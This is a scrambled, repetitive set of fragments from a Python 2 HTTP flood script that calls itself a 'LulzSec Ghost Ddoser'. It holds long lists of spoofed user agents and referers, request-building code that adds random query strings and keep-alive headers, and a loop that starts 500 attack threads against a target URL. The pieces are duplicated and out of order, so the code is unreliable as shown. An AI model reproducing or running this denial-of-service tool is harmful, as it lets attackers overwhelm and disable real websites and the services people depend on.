headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0", "rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 
251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3", "Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru;", "(Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko)", "NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4;", "(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19", "Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si", "AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('", "by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 
(+)')", "ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason", "headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')", "~ ~ / / / / / / / / ~ ~~ ~~~", "miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1", "/-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,'", "request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1)", "headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like", "(KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like", "class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus", "headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)')", "headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Mozilla/5.0 (Android; 
Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4", "(aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo", "else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))", "Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print", "By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot;", "Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence", "Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . 
_____|\\ _.--|", "NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS:", "~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~ _// ~ ~", "& (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts", "Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas", "NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1)", "re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread() t.start()", "5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)')", "headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot", "(Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK 
UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO')", "hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0')", "(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0", "/ / / / / / / / ~ ~~ ~~~ ~~~ ~~~", "Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html;", "/ \\: `:\\ \\ // `:`. ,' \\ /-._; | : : ::", "hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo", "Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r'", "5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') 
headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)')", "bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str = '' for", "global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko)", "3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine -", "and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)')", "OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)')", "headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook')", "headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') 
headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at", "(abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at", "except Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread):", "keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS')", "U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1;", "flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else:", "(Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android", "www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser", "like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0", "headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') 
headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0;", "(KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like", "AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10')", "headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07", "agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)", "Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca", "headers_useragents.append('Xiino/1.0.9E 
[en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501", "headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2", "bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string", "(PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2;", "crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') 
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')", "keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger')", "Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x", "keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson", "headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP", "(Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)')", "url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def", "headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') 
headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4')", "Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy", "keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst')", "isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001", "def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url", "3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible;", "com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') 
headers_useragents.append('Asahina-Antenna/1.x')", "\"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url", "headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version:", "90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>'", "Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like", "Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>')", "headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)')", "headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind')", "+= chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec", "RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler", "keyword_top.append('Ipad Air') 
keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca", "nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://'", "MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x", "Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url", "(request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2:", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100", "at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad", "/ |`-:_ ; | | | : \\ `--. 
) /|-._: : |", "Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;", ".NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0", "1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK", "Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0;", "(+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com", "ascii string def buildblock(size): out_str = '' for i in range(0, size): a", "def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By", "X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20", "headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') 
headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U;", "code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller", "flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors", "headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1", "Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "headers_referers.append('http://api.duckduckgo.com/html/?q=') 
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) &", 